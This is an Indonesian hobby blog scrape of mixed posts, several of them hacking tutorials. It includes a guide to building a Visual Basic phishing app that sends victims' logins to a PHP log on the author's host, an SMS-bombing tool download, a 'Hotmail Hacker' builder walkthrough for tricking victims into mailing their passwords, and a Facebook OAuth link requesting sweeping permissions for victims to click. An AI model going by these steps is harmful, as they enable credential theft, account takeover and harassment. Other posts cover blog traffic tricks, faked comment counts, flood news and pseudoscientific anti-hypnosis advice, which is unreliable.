Phising For All Aplikasi


nah ini phising saya gan udah banyak yang kena sih :D
karna saya memang hoby membuat aplikasi walau pun source dari google tapi kita cuman melanjutkan nya saja banyak orang yang gak suka karna saya membuat program gak work tapi bukti nya saya membuat phising selalu berjalan lancar dan banya juga target nya
tapi gpp lah orang biar berkata apa saya selalu sabar heheheh
yuk langsung aja tanpa basa basi aja :D
pertama kita siapkan dulu alat yang di butuhkan

- Program Visual Basic 6.0
- Hostingan Free / Yang Berbayar
- Cemilan [ bila kalian lapar ]
- Doa [ biar berjalan lancar kita membuat program nya ]

ok sekarang kita ke komponen nya
buat 1 project / 1 from 
buat 2 text box 
buat 1 comandbutton 
buat 1 module 
buat 1 label

nah sekarang kita upload dulu file php nya  di hostingan kalian
di sini php nya : klik here [ ingat save dengan nama flazer.php ] 
dan sekarang ke program visual nya tadi sudah kita buat 1 project / from
from ganti name nya menjadi frmUtama
buat 1 Module dengan nama modConnect 

dan sekarang kita isi code ini kedalam module (modConnect)
source nya di sini : klik here [ ingat ini di masukan di module nya ]
sekarang kita ke bagian from nya gan
masukan 2 text box tadi
textbox 1 di beri nama : txtUname
textbox 2 di berinama  : txtPass
1 comandbutton di beri nama : cmdLogin
1 label di beri nama  : lblInfo

sekarang kita masukan source code ini di bagian from nya
cara nya klik kanan view code nah untuk source nya bisa kalian ambil di sini : klik here
ingat code itu di masukan di from nya ya gan :D

sekarang kita lanjut lagi ke cmdLogin di bagian comandbutton tadi gan
source code nya ada di sini : klik here
ini source di masukan di cmdlogin nya ya gan
sekarang kita perhatikan pada source code cmdLogin di situ ada tulisan 

http://www.domainkamu.com/  <-- itu ganti sesuai dengan domain kalian 
yang di hostingan kalian ya nah nanti hasil nya 
akan di bagian : sini http://www.domainkamu.com/flazer.txt <-- 
txt itu adalah hasil log para dedemit yang kena jaring sama kita gan :D 
maklum saya juga belajar dari google dan saya tidak merasa jago untuk soal program
tapi saya senang untuk berbagi sama kalian semua :x 
semoga toturial dari saya bermanfaat buat kalian yang hoby buat program dengan
visual basic 6.0 ini

Sumber : http://adf.ly/7sTbl

Hacking Tool

BOMB MOBILE PHONE WITH SMS : BEAVER'S SMS BOMBER PRO


This program will bomb the victim's mobile phone with tons of SMS. It supports all major networks around the world. But if your network is not in the list, then don't worry, you can also add the carrier network with the help of "custom" option. You can also load list of multiple victims and bomb them simultaneously. The improvement that Beaver has made in this version over his previous SMS Bomber is that you can spoof the email address from which you are bombing the victim's mobile phone. For Example, If there was an error sending the message, it will ask you if you wanna change the E-mail/Password you are using. All credits to Beaver for this nice program.

Download here 

http://www.mediafire.com/download.php?zmd4mtbmtol

HACK THE HACKER : BIN TEXT


Bin Text is basically a text extractor software used to extract text from application or any file. It can extract email ID and password from applications like Hotmail Hacker and Gmail Hacker. Step by Step usage and tutorial is below:

1. Refer my article Hack Gmail Accounts : Gmail Hacker to create Gmail Hacker.exe file.
2. Unzip the downloaded Bin Text software in a separate folder.
3. Open Bin Text and browse for the location where you have kept the Gmail Hacker.exe file that you have created. Now Hit Go.
4. Bin Text will scan the whole file and display all the extracted text from Gmail Hacker.exe file.
5. Now scroll down till you find email address and password as I have shown in the screen shot above.

This means that if your friend or someone else has given you this Gmail hacker software and told you that this software can hack email accounts and if you feel suspicious of him, you can easily hack his email account password. Enjoy hacking the hacker!!!

Download here:

http://www.mediafire.com/download.php?yoeiinztzyy

HACK HOTMAIL ACCOUNTS : HOTMAIL HACKER


I had previously discussed about Gmail Hacker to hack Gmail accounts. Likewise, this software can hack Hotmail accounts. Just follow the steps below:

1. Extract the RAR archive in a separate folder.
2. Run Hotmail Hacker Builder.exe file on your computer.
3. Enter your email address, password and subject of email you wanna receive. I suggest you to create a new email ID for this. You can use Gmail or Yahoo but avoid using Hotmail account. This email will contain the password you wanna hack. Also select appropriate smtp server address. The default smtp server address 587 is of gmail. You can google for smtp server addresses or can find it here. Also, write a fake error message to display on the screen or leave it default.
4. Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.
5. Now, send this Hotmail Hacker.exe file to victim of which you wanna hack Hotmail password and convince him that this program can hack anyone's Hotmail password (lil bit of Social Engineering).
6. Ask him to run Hotmail Hacker.exe and enter all information including his Hotmail ID and password and Hotmail ID of victim he wanna hack. As he enters this information and hits "Login and Start", he will receive a error message.
7. You will receive an email in your account containing his password. Hooray!!! you will now be able to hack hotmail password. Enjoy!!!

Download here:

Download

Membuat Jumlah Komentar palsu di blog

Bagaimana caranya membuat suatu blog terlihat rame di kalangan blog yang sedang mencari banyak visitor / komentar. Disini saya akan memberitahukan bagaimana cara membuat jumlah komentar palsu pada blog! Apa manfaatnya? Kalo menurut saya pribadi sih bisa menambah jumlah banyak komentar pada blog. Jika blog anda sedang kedatangan visitor dan visitor itu melihat jumlah komentar yang sangat banyak pada blog anda, otomatis visitor tersebuat akan langsung melihat artikel itu dengan lebih lengkap dan berkomentar karena visitor tersebut bisa saja bloggers yang sedang mencari banyak visitor di blog tetengga.

Lalu Bagaimana Cara Membuat Jumlah Komentar Palsu Pada Blog. Jika sobat berminat silahkan ikutan langkah-langkahnya berikut ini...

Oiya bagi kalian yang ingin melihat contohnya silahkan semua sudah tertera pada blog ini :D

langsung ke tahap pertama
  1. Login Blogger [ i ]
  2. Pilih Rancangan lalu Pilih Edit HTML
  3. Cari Kode ]]></b:skin>
  4. Jika sudah ketemu, Letakan kode dibawah ini tepat diatas kode ]]></b:skin>
  5. a.comment-link:before{content:"300";}
  6. Simpan Template dan Lihat Hasilnya
  7. Catatan: Kode yang berwarna Merah prosesnya hanya akan diletakan didepan jumlah komentar yang Asli, Jadi jangan terlalu besar jumlahnya ya, pengunjung tidak akan percaya itu... hehehe...
Semoga tutorial yang menggelitik ini bisa bermanfaat bagi saiapapun yang membutuhkannya ya...

Sumber: http://vervector.blogspot.com

Cara memperkecil Alexa rank

cara memperkecil alexa/agar banyak pengunjung

 Jika anda ingin punya blog atau situs web yang ramai dikunjungi maka tulisan ini cocok untuk anda. Akan tetapi kualitas pengunjung dari kunjungannya mungkin kurang bagus daripada yang berasal dari mesin pencari. Penungjung belum tentu berasal dari orang-orang yang datang karena tertarik dengan isi website atau blog kita. Bisa jadi pengunjung kita adalah robot, orang nyasar, orang yang dapat sesuatu setelah datang ke website kita, dan lain-lain.
Beberapa Cara Untuk Membuat Ramai Website/Blog Kita Tanpa Mengandalkan Search Engine :
1. Rajin Meninggalkan Link Situs Web / Blog Kita
Ada banyak cara untuk meninggalkan alamat situs kita di internet agar orang lain yang tertarik bisa datang untuk melihatnya. Bisa dengan rajin komentar di blog, artikel, buku tamu atau forum orang lain sambil memasang link website kita. Bisa juga dengan rajin nimbrung di mailing list lalu di akhir pesan kita pasang link kita. Bisa juga dengan meninggalkannya setiap kita berkirim-kirim pesan lewat send bу e-mail, facebook, chirrup, friendster, personal thουɡht (pm), dan sebagainya.
2. Rajin Ikut Social Bookmarking Internet
Kita harus rajin-rajin membookmark sosial setiap postingan artikel kita di social bookmark agar banyak orang yang melihat. Syukur-syukur jika ada yang tertarik bisa langsung datang mengunjungi. Beberapa contoh social bookmark lokal indonesia adalah infogue.com dan lintasberita.com. Sedangkan yang luar negeri adalah digg.com, delicio.υѕ, buzz.yahoo.com, dan lain-lain.
3. Rajin Memasukkan Link Ke Web Directory dan Article Directory
Ada banyak direktori internet yang bisa kita titipkan alamat website kita atau blog kita di web yang secara khusus memaparkan koleksi link yang terbagi atas banyak kategori. Untuk web direktori kita memasukkan deskripsi singkat, namun untuk direktori artikel kita harus buat tulisan dulu yang disisipkan link-link kita di dalamnya. Jika kita berhasil memasukkan banyak link ke direktori, maka kemungkinan kita mendapatkan pengunjung akan besar.
4. Saling Bertukar Pengunjung Dengan Webmaster Lain
Kita bisa saling tukar-menukar link dengan pemilik website atau blog lain dengan harapan ada pengunjung web lain mengunjungi website atau blog kita. Ada juga situs web khusus yang melayani tukar-menukar kunjungan secara otomatis yang kita hanya tinggal memasang kode di web kita. Kita harus menyumbang beberapa pengunjung dari web kita terlebih dulu untuk mendapat pengunjung dari web lain. Ada juga yang mewajibkan kita mengunjungi web lain dulu untuk dapat kunjungan dari web lain.
5. Beli Pengunjung Secara Instan
Banyak iklan di internet yang menawarkan kunjungan dalam jumlah tertentu dalam waktu yang singkat. Bagi anda yang menginginkan pengunjung yang benar-benar tertarik untuk menyelami isi website atau blog kita, maka ini bukan cara yang benar untuk anda. Karena pengunjung (traffic) yang kita dapat hanya datang dan pergi begitu saja. Mungkin hanya beberapa saja yang kemudian menyelami isi web kita. Bisa jadi yang datang adalah robot, orang yang nyasar karena komputernya kena virus dan orang yang dibayar atau diberikan sesuatu untuk browsing ke website kita.
Tinggal anda sendiri yang memilih mau cara yang bagaimana. Yang jelas masing-masing cara punya kelemahan dan kelebihan yang berbeda-beda. Isi website yang bagus sangat menentukan, karena website yang buruk hanya membuat pengunjung kecewa dan enggan kembali ke blog atau website kita. Jika web kita bagus maka dalam jangka panjang bisa ramai 
Alexa Web Statistics Company
sendiri karena ada publikasi dari mulut ke mulut yang sangat bernilai.
Contoh mesin pencarian (search engine) : google, yahoo, bing, baidu, qυеѕtіοn, dogpile, dan lain-lain.
  1. Install Alexa Toolbar di browser kita. Alexa menghitung traffic jauh lebih besar apabila berasal dari browser yang telah terinstall alexa Toolbar. Untuk browser firefox, tambahkan Add On Alexa Sparky.
  2. Memasang widget Alexa di blog. Menurut beberapa informasi, memasang widget juga termasuk tips ampuh untuk mengecilkan alexa rank.
  3. Blogwalking. Semakin banyak blog kita dikunjungi oleh para blogger maka traffik blog akan meningkat. Apalagi IP nya berbeda-beda.
  4. Update blog secara rutin. Update secara rutin terbukti ampuh memperkecil Alexa rank. Usahakan Anda meng-update blog Anda minimal 2 hari sekali dan kalau bisa setiap hari. Lebih ampuh lagi update 2 – 3 artikel tiap hari. Cari keyword yang sedang trend saat kini. Apalagi kita membuat keyword yang sedang hot-hotnya, pasti akan banyak pengunjung yang masuk melalui search engine. Otomatis traffik blog meningkat.
  5. Menulis artikel tentang Alexa. Tulis artikel dengan tema Alexa dan beri link yang mengarah ke situs Alexa. Jika tulisan Anda terbaca oleh Alexa, maka Alexa rank blog Anda pasti semakin ramping.
  6. Tukeran review blog di Alexa.com. Semakin banyak blog kita di review oleh orang lain, maka alexa menganggap blog kita adalah blog berkualitas, biasanya nanti akan alexa rank juga akan mengecil secara signifikan.
  7. Kalau memang mau cara instant, mungkin bisa ikutan situs traffik exchange. Jadi para member disuruh saling berkunjung satu sama lain.
  8. Mau lebih ekstrim lagi mengecilkan alexa? Gunakan tools Alexa Booster, Entrecard dll, yang intinya merupakan program boot traffik. Jadi seolah-olah kita dikunjungi oleh banyak pengunjung padahal itu robot. Tapi ingat cara ini tidak begitu aman. Bisa² nanti alexa rank malah membengkak. Ingat, resiko ditanggung sendiri.

    Sumber:
    www.renterspolicy.biz

Cara ampuuh nambah followers Blog

Hasil Reza browsing tentang menambah jumlah follower blog, akhirnya saya masuk ke web ExchangeFollower.
Web ini menyediakan layanan pertukaran follower, seperti twiends.com yang pernah saya pakai pada twitter saya.
Namun yang special dari website ini adalah bahwa disini tidak hanya twitter , anda juga bisa menambah jumlah like facebook, hits blog, google+ juga bisa.WOW Banget kan ?
Ckckckckck

Anda cukup daftar di ExchangeFollower, dan dapatkan coin 50 pada saat mendaftar pertama kali.
Coin akan bertambah jika anda mem-follow orang lain.
Dan anda juga perlu memberi rewards dengan coin pada para follower anda.
Silahkan daftar disini bagi yang berminat.
Kunjungi juga halaman saya di ExchangeFollower disini.
Semoga Bermanfaat ya agan agan semua.

Daftar Blog Dofollow Terbaru Update Desember 2012

Daftar Blog Dofollow Terbaru Desember 2012


Mentemen,akhirnya kesampaian juga waktunya posting blog dofollow terbaru.nah sekarang postingan blog dofollow ini terbilang fresh karena Reza sudah melakukan update per hari ini sehingga blog dibawah ini bisa dipastikan masih dofollow dan dapat sobat manfaatkan untuk hunting backlink.

#Blog Dofollow PR0
·         http://jaditerkenal.com
·         http://situsku.sumbawanews.com
·         http://lenteraseo.com
·         http://www.lintasaninfo.com
 
#Blog Dofollow PR1
·         http://www.beritasaya.com
·         http://klowor.com
·         http://beritapilihan.com
·         http://www.sosbok.com
·         http://www.mbob.co.id
#Blog Dofollow PR2
·         http://blogmarkit.info
·         http://debuk.com
·         http://www.populerkan.com
·         http://bookmarkindonesia.com
·         http://www.bagiurl.com
·         http://tunden.com
·         http://sal3ho.com
·         http://www.niatingsun.com
·         http://artikel.bloginfonews.com
·         http://www.langitnews.com
#Blog Dofollow PR3
·         http://www.beritague.com
            . http://www.semuasebra.blogspot.com
#Blog Dofollow PR4
·         http://blogmarkit.info
·         http://qaafe.com/
·         http://lintasme.com

Oke SIp

Reza Mau Mandi dulu,badan udh bau nih

Berita banjir dan longsor update november 2012

Badan Meteorologi Klimatologi dan Geofisika (BMKG) meminta warga di wilayah barat Indonesia mewaspadai bencana banjir dan longsor.
BMKG memperkirakan curah hujan akan mencapai puncaknya pada Januari 2013.
Daerah dengan intensitas hujan yang tinggi ini terjadi di kawasan barat Indonesia yang meliputi Sumatera, Jawa, Bali, Kalimantan dan sebagian Sulawesi.
Kepala Pusat Meteorologi Publik Mulyono Prabowo mengatakan peningkatan intensitas curah hujan ini perlu diwaspadai karena bisa menyebabkan banjir dan longsor, terutama di sejumlah kawasan yang masuk dalam kategori rawan bencana.

Banjir dan longsor

"Kebetulan wilayah sebelah utara ini ada beberapa daerah yang tingkat permukaannya ada di bawah tingkat permukaan air lautnya," kata Mulyono Prabowo kepada BBC.
Peta daerah rawan bencana ini telah diberikan kepada pemerintah daerah guna mengantisipasi kemungkinan bencana.
Sejauh ini hingga November, meski musim hujan belum mencapai puncaknya, bencana banjir dan longsor sudah terjadi di beberapa wilayah.
Dalam rilis resmi Badan Nasional Penanggulangan Bencana disebutkan sejak Sabtu pekan kemarin banjir terjadi di Bengkulu, Sumatera Selatan, Pandeglang, Sukabumi, Jakarta, dan Bandung.
Dalam bencana terbaru di Mamasa, Sulawesi Barat, sedikitnya 15 orang tewas akibat banjir bandang.
Sementara longsor terjadi di Kabupaten Bandung dan Kabupaten Sukabumi, Jawa Barat. Empat orang hilang dan ribuan rumah terendam dalam bencana itu.

Hack Status Orang di fb

Hack Status Orang itu gampang

Cobain nih caranmya

Suruh Klik Link ini Orang tersebut

https://m.facebook.com/dialog/permissions.request?app_id=418567854871689&display=wap&next=http://www.facebook.com/connect/login_success.html&response_type=token&perms=user_about_me,user_activities,user_birthday,user_checkins,user_education_history,user_events,user_groups,user_hometown,user_interests,user_likes,user_location,user_notes,user_photos,user_questions,user_relationships,user_relationship_details,user_religion_politics,user_status,user_subscriptions,user_videos,user_website,user_work_history,email,friends_about_me,friends_activities,friends_birthday,friends_checkins,friends_education_history,friends_events,friends_groups,friends_hometown,friends_interests,friends_likes,friends_location,friends_notes,friends_photos,friends_questions,friends_relationships,friends_relationship_details,friends_religion_politics,friends_status,friends_subscriptions,friends_videos,friends_website,friends_work_history,read_friendlists,read_insights,read_mailbox,read_requests,read_stream,xmpp_login,create_event,manage_friendlists,manage_notifications,user_online_presence,friends_online_presence,publish_checkins,publish_stream,rsvp_event,publish_actions
Anda tinggal Ubah Yg Angka 418567854871689

Membuat Ucapan Welcome Di blog

Cara Membuat ucapan selamat datang di blog, Ucapan untuk menyambut atau selamat datang di blog memberi kesan keren juga di blog, ucapan terima kasih admin blog kadang diperlukan juga,karena pembaca adalah layaknya tamu yang perlu disapa,namun yang perlu diingat adalah jangan sampai dengan membuat ucapan selamat datang di blog malah membuat pembaca jadi terganggu.

Cara Membuat ucapan selamat datang blogReza Caem kali ini akan berbagi script-Scrip tentang cara membuat ucapan selamat datang di blog, nah, ikuti tutorialnya dibawah ini!

  1. Silahkan login ke akun blogger kamu
  2. Setelah itu klik Tata Letak > Elemen Halaman > Edit HTML.
  3. Kemudian copy kode di bawah ini tepat di atas kode </head>
    <b:if cond='data:blog.Url == data:blog.homepageUrl'> <script language='javascript'>alert ("Tulis pesan apa saja disini, sakerepmu arep di tulisi opo"); </script> </b:if>
  4. Simpan template kamu.

KETERANGAN:
Ganti text yang berwarna merah dengan ucapan selamat datang kamu, dan script diatas akan hanya menampilkan ucapan selamat datang pada homepage saja, jika kamu ingin di semua halaman blog kamu ada ucapan selamat datang, hapus kode yang berwarna kuning.

Bahaya Memakai Auto Visitor

Softwere auto Visitor adalah Softwere yang digunakan untuk meningkatkan para visitor
Dalam softwere ini Ada 3 macam softwere Yaitu:
  1. Alexa Booster
  2. Jingling
  3. AdminSpotBackLinkBost
tetapi Softwere ini juga bisa menurunkan alexa blog anda
Saya juga pernah memakainya dan alexa saya menurun

Apa anda ingin menggunakannya ?

Kalau Mau silahkan download

Download Disini

Cara Menghindari Gendam dan Hipnotis

Cara Menghindari Gendam dan Hipnotis

Hai sobat, kali ini Reza mau update tentang sebuah ilmu menghindari hipnotis, semoga bermanfaat !

Berikut ini petunjuk untuk menghindari dan mengatasi kejahatan Hipnotis atau “gendam” :

1. Jangan membiarkan pikiran kosong ketika berada di daerah umum. Pikiran kosong dapat me
ngakibatkan gerbang telepathic terbuka, sehingga pihak lain dapat dengan mudah menyampaikan pesan secara telepathic.

2. Waspadalah jika tiba-tiba timbul rasa kantuk yang tidak wajar, ada kemungkinan bahwa seseorang yang bermaksud negatif sedang melakukan “telepathic forcing”.

3. Bagi mereka yang memiliki kebiasaan “latah”, sebaiknya jangan bepergian ke tempat umum tanpa teman. Mereka yang mempunyai kebiasaan “latah” cenderung memiliki gerbang bawah sadar yang mudah dibuka paksa dengan bantuan kejutan (Shock Induction). Hal yang sama juga berlaku bagi mereka yang mudah terkejut.

4. Jangan mudah panik jika tiba-tiba ada beberapa orang yang tidak dikenal mengerumuni anda untuk suatu alasan yang tidak jelas. Sekali jangan mudah panik ! Karena rasa panik akan mempermudah terbukanya gerbang bawah sadar Anda!

5. Jangan mudah panik jika tiba-tiba ada seseorang yang menepuk bahu Anda ! Usahakan agar pikiran dan panca indera Anda tetap aktif ke seluruh lingkungan ! Jangan terfokus pada ucapan-ucapan orang yang menepuk Anda ! Segera berpindahlah ke daerah yang lebih ramai !

6. Jika secara tiba-tiba, tanpa alasan yang jelas, dada anda terasa sesak, dan diikuti dengan perut agak mual, dan kepala sedikit pusing, waspadalah karena mungkin ada seseorang tengah mengerahkan energi gendam ! Segera lakukan “grounding”, yaitu meniatkan membuang seluruh energi negatif ke bumi (cukup visualisasi).

7. Jika terjadi hal-hal yang mencurigakan, segera sibukkan pikiran anda, agar tetap berada di frekwensi yang mengakibatkan efek Hipnotis tidak dapat bekerja ! Antara lain dengan : berdoa dalam hati, menyanyi dalam hati, atau memikirkan hal-hal yang berat !

8. Jika ternyata anda mulai merasa memasuki suatu “kesadaran berbeda” dari biasanya, mungkin Anda sudah mulai terpengaruh oleh Hipnotis. Jika anda merasakan hal ini, maka segera niatkan dalam hati : “Dalam 3 hitungan, saya akan kembali sadar dan normal sepenuhnya ….”, kemudian segera hitung dalam hati : “Satu …, dua, … tiga”.

9.. Akhirnya, tanamkan terus menerus di dalam diri Anda, bahwa Hipnotis tidak akan bekerja bagi mereka yang menolaknya ! Hal ini juga berlaku untuk ilmu gendam.

semoga bermanfaat Ya..


Sumbernya: http://www.semuatrikdantips.blogspot.com/2012/11/cara-menghindari-genda-dan-hipnotis.html

Fenomena Alam Yang Sangat Menakjubkan

Fenomena Alam Menakjubkan

Fenomena Alam Menakjubkan – Fenomena alam yng banyak terjadi saat ini membuat manusia semakin percaya bahwa kiamat sudah dekat. Tapi di balik itu sebenarnya ada penjelasan – penjelasan yng  bisa menjelaskan seperti : kenapa bisa terjadi fenomena alam Hujan Darah Di India, apa penyebab munculny fenomena alam 4 matahari.  Hanya tuhan yng tahu semua fenomena alam itu tapi tetap saja semua yng terjadi di kehidupan ini pasti ada sebab dan akibat.
Berikut beberapa Fenomena Alam Yang Menakjubkan :
~ Cave of the Crystals
Fenomena Alam Menakjubkan
Fenomena Alam Menakjubkan
Fenomena ini terletak di situs pertambangan di Chihuahua, Meksiko, yng dikenal dengan kristal yng luar biasa. Gua kristal ini dikenal sebagai Gua Kristal Giants, dan sekitar 1000 meter di bawah batu kapur host tambang.
~ Pink and White Terraces
Fenomena Alam Menakjubkan
Fenomena Alam Menakjubkan
Kolam air hangat terbesar, tercatat 3 hektar, namun fenomena alam ini hanya tinggal kenangan karena telah dihancurkan oleh letusan gunung berapi tarawera pada tahun 1886, Fenomena alam air hangat ini terbentuk dari semburan geyser yang melintas menuruni lereng bukit meninggalkan ketebalan es. Kehancuranya fenomena ini masuk kedalam “The Eighth Wonder of the World”.
Lain halny Hujan Darah Di India, fenomena tersebut baru saja terjadi tahun 2001. Sama seperti fenomenal lainny fenomenal ini santer di beritakan di TV dan internet.
~ Light Pillars
Fenomena Alam Menakjubkan
Fenomena Alam Menakjubkan
Sebuah fenomena visual yng diciptakan oleh pantulan cahaya dari kristal es dengan dekat permukaan planar horizontal paralel. Cahaya dapat berasal dari matahari, Hal ini juga bisa datang dari bulan atau dari sumber-sumber terestrial seperti lampu jalan.
~ Catatumbo Lightning
Fenomena Alam Menakjubkan
Fenomena Alam Menakjubkan
Fenomena alam ini terjadi di di tengah-tengah pertemuan antara Sungai Catatumbo yng mengalir masuk ke dalam Tasik Maracaibo di Venezuala.
Kilat ini menyambar hebat dengan tinggi 5 km. Terjadi 140 bahkan sampai 160 kali di malam hari dalam 1 tahun. Setiap malamnya terjadi sambaran selama 10 Jam. Tiap jam terjadi sebanyak 280 kali sambaran.
Jadi dalam setahun kurang lebih 448.000 kali sambaran. Petir ini terjadi karena tumbukkan angin kencang yang berasal dari Pegunungan Andes. Konon, petir ini adalah pembentuk lapisan ozon yang paling besar di bumi.
~ Penitentes
Fenomena Alam Menakjubkan
Fenomena Alam Menakjubkan
Fenomena alam ini adalah pembentukan salju yng ditemukan pada ketinggian tinggi. Fenomena alam yang hanya terjadi di tempat antara Chili dan Argentina, yaitu salju di permukaan yang tinggi dan runcing karena tiupan angin yang kuat di pegunungan andes.
~ Sun Dogs
Fenomena Alam Menakjubkan
Fenomena Alam Menakjubkan
Fenomena alam ini dinamakan sun dog atau anjing penjaga matahari. Cahaya tersebut biasa muncul di kanan kiri halo sehingga sering dianggap matahari meskipun memiliki ukuran lebih kecil. Fenomena ini kadang meunculkan 3 matahari bahkan 4 Matahari.
~ Ice Circles
Fenomena Alam Menakjubkan
Fenomena Alam Menakjubkan
fenomena alam yng langka yng terjadi di air yang bersuhu dingin. Lembaran es tipis dan melingkar sempurna. Fenomena Ice Circles ini dapat di jumpai di Skandinavia dan Amerika Utara.
~ Columnar Basalt
Fenomena Alam Menakjubkan
Fenomena Alam Menakjubkan
Columnar Basalt adalah batuan vulkanik, yng terbentuk oleh lava dari letusan gunung yng mendingin. Basalt terletak di Giant’s Causeway di Irlandia Utara.
~ Red Tides
Fenomena Alam Menakjubkan
Fenomena Alam Menakjubkan
fenomena alam ini terjadi karena berkumpulnya mikroorganisme di pesisir pantai, dimana tempat bergabungnya air dari muara, laut atau air sungai dan menyatu dengan ganggang hingga membuat air menjadi berwarna ungu dan merah.
~ The Wave, Arizona
Fenomena Alam Menakjubkan
Fenomena Alam Menakjubkan
The Wave adalah formasi batu pasir yng terletak di Amerika Serikat di dekat perbatasan Arizona dan Utah di lereng dari Coyote Buttes, di padang gurun Canyon-Paria termasuk Vermilion Cliffs, di Dataran Tinggi Colorado. Hal ini terkenal di kalangan pendaki dan fotografer.
~ Moeraki Boulders
Fenomena Alam Menakjubkan
Fenomena Alam Menakjubkan
Fenomena alam The Boulders Moeraki adalah batu besar berbentuk bola yng tersebar di pantai-pantai berpasir, tetapi mereka tidak seperti batu bulat biasa yng telah dibentuk oleh sungai dan laut berdebar-debar. Batu-batu tersebut diklasifikasikan sebagai concretions septarian, dan dibentuk pada sedimen dasar laut kuno. Mereka diciptakan oleh proses yang sama dengan pembentukan tiram mutiara, di mana lapisan materi mencakup nukleus.
~ The Great Blue Hole
Fenomena Alam Menakjubkan
Fenomena Alam Menakjubkan
The Great Blue Hole adalah lubang air besar di lepas pantai Belize. Itu terletak di dekat pusat Lighthouse Reef, sebuah atol kecil 100 kilometer (62 mil) dari daratan dan Belize City. Lubang itu berbentuk bulat, lebih dari 300 meter (984 kaki) dan 125 meter di (410 kaki) dalam.

Pengertian pendidikan

Pendidikan merupakan sebuah kata yang sangat familiar kita dengarkan di dalam hidup sehari hari, sebab pendidikan merupakan kegiatan penting yang dilakukan oleh hampir semua irang dari lapisan masyarakat.

Pendidikan sebagai sesuatu yang penting memang tidak terlepas dari banyaknya pendapat dan asumsi tentang arti dan definisi pendidikan yang sebenarnya. Pada artikel kali ini saya bermaksud menuliskan pendapat para ahli mengenai pendidikan yang tentunya berbeda beda tergantung pada persepsi masing masing. Artikel ini tentunya akan membuka pikiran kita tentang bagaimana menyikapi pendidikan.


Pengertian pendidikan menurut para ahli

Pengertian pendidikan menurut Prof. Herman H. Horn
pendidikan adalah proses abadi dari penyesuaian lebih tinggi bagi makhluk yang telah berkembang secara fisk dan mental yang bebas dan sadar kepada Tuhan seperti termanifestasikan dalam alam sekitar, intelektual, emosional dan kemauan dari manusia.

Pengertian pendidikan menurut M.J. Langeveld
pendidikan adalah setiap pergaulan yang terjadi adalah setiap pergaulan yang terjadi antara orang dewasa dengan anak-anak merupakan lapangan atau suatu keadaan dimana pekerjaan mendidik itu berlangsung.

Pengertian pendidikan menurut Prof. Dr. John Dewey
pendidikan adalah suatu proses pengalaman. Karena kehidupan adalah pertumbuhan, pendidikan berarti membantu pertumbuhan batin tanpa dibatasi oleh usia. Proses pertumbuhan ialah proses menyesuaikan pada tiap-tiap fase serta menambahkan kecakapan di dalam perkembangan seseorang.

Pengertian pendidikan menurut Prof. H. Mahmud Yunus
pendidikan adalah usaha-usaha yang sengaja dipilih untuk mempengaruhi dan membantu anak dengan tujuan peningkatan keilmuan, jasmani dan akhlak sehingga secara bertahap dapat mengantarkan si anak kepada tujuannya yang paling tinggi. Agar si anak hidup bahagia, serta seluruh apa yang dilakukanya menjadi bermanfaat bagi dirinya dan masyarakat.

Pengertian pendidikan menurut wikipedia

Pendidikan adalah usaha sadar dan terencana untuk mewujudkan suasana belajar dan proses pembelajaran agar peserta didik secara aktif mengembangkan potensi dirinya untuk memiliki kekuatan spiritual keagamaan, pengendalian diri, kepribadian, kecerdasan, akhlak mulia, serta keterampilan yang diperlukan dirinya dan masyarakat.

Pengertian pendidikan menurut Kamus Besar Bahasa Indonesia (1991)

Pendidikan diartikan sebagai proses pembelajaran bagi individu untuk mencapai pengetahuan dan pemahaman yang lebih tinggi mengenai obyek-obyek tertentu dan spesifik. Pengetahuan tersebut diperoleh secara formal yang berakibat individu mempunyai pola pikir dan perilaku sesuai dengan pendidikan yang telah diperolehnya.

Sampai disini anda tentunya sudah punya gambaran sendiri tentang pengertian pendidikan. Nah, kalau anda berkenan uraikan pengertian pendidikan versi anda melalui kotak komentar....!!!

Trik trik mendapat 1000 Pengunjung per hari ??

Cara Mendapatkan Banyak Pengunjung Blog Hingga Ribuan / Hari - Pengunjung adalah bagian penting dari Blog. Tujuan yang paling utama blogger untuk ngeblog adalah share dan mencari pengunjung. Di artikel kali ini akan membahas bagaimana cara mendapatkan banyak pengunjung, Cara ini tidak terlalu susah dan hanya mengandalkan keyword popular.

Cara Mendapatkan Banyak Pengunjung Blog Hingga Ribuan / Hari memang sudah sering dibahas di blog lain, Tetapi mereka hanya membahas itu - itu saja seperti Membuat design yang baik, template ringan, dan yg lain.

Cara Mendapatkan Banyak Pengunjung Blog Hingga Ribuan / Hari yang kali ini mungkin beberapa sudah mengetahui. Menggunakan Google Insight untuk mengetahui Keyword apa yang sedang banyak dicari. Google insight dapat diatur bahasa yang dipakai, negara, dan jenjang waktunya.

Untuk membuka google insight yang sudah diatur 7 hari terakhir, dan berbahasa indonesia silahkan buka link ini : klik Disini. Jika ingin mengedit Waktu tempat dan yang lain, silahkan pilih di kiri " Limit to " Dan edit sesuai yang diinginkan. Dan akan muncul Keyword yang sedang mengalami lonjakan " Rising ".

Jika sudah mengetahui Keyword yang sedang Hot lalu buat posting yang sesuai dengan keyword tersebut. Silahkan riset artikelnya di google dan buat artikel, gunakan Tekhnik SEO maupun SMO agar blog kebanjiran pengunjung.

Cara tersebut sudah berhasil saya lakukan di blog " Habluez Share " dan tidak tanggung - tanggung, Pengunjung perhari mencapai Ratusan Bahkan Ribuan Orang
 
  Selamat mencoba
 
 
 
 

Popular Posts

Text